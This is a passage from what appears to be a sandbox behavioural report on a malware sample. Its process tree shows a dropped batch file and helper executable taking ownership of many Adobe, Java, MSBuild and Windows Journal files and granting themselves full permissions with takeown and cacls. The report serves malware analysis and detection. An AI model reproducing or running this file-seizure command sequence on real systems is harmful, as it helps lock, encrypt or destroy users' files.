    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1868
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1896
    - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK64.exe
        
        3w3GwRsK.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1492
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1108
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:1540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1516
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    - Modifies file permissions
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1492
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1228
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1056
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  - Loads dropped DLL
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1824
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:1920
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  - Loads dropped DLL
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:932
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:1828
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1256
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""
  2⤵
  - Loads dropped DLL
  PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Dotted_Line.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Dotted_Line.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1928
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1828
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""
  2⤵
  - Loads dropped DLL
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Graph.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Graph.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""
  2⤵
  - Loads dropped DLL
  PID:1316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1464
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1432
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:324
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1184
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""
  2⤵
  - Loads dropped DLL
  PID:1004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C
    3⤵
    PID:940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Memo.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Memo.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:944
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""
  2⤵
  - Loads dropped DLL
  PID:1796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C
    3⤵
    PID:112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Genko_2.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Genko_2.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1400
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""
  2⤵
  - Loads dropped DLL
  PID:940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Music.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1464
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Music.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1480
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1864
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""
  2⤵
  - Loads dropped DLL
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Genko_1.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Genko_1.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:908
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""
  2⤵
  - Loads dropped DLL
  PID:1884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C
    3⤵
    PID:684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "PDIALOG.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:932
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "PDIALOG.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1812
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""
  2⤵
  - Loads dropped DLL
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Shorthand.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1708
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Shorthand.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1032
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  - Loads dropped DLL
  PID:1060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
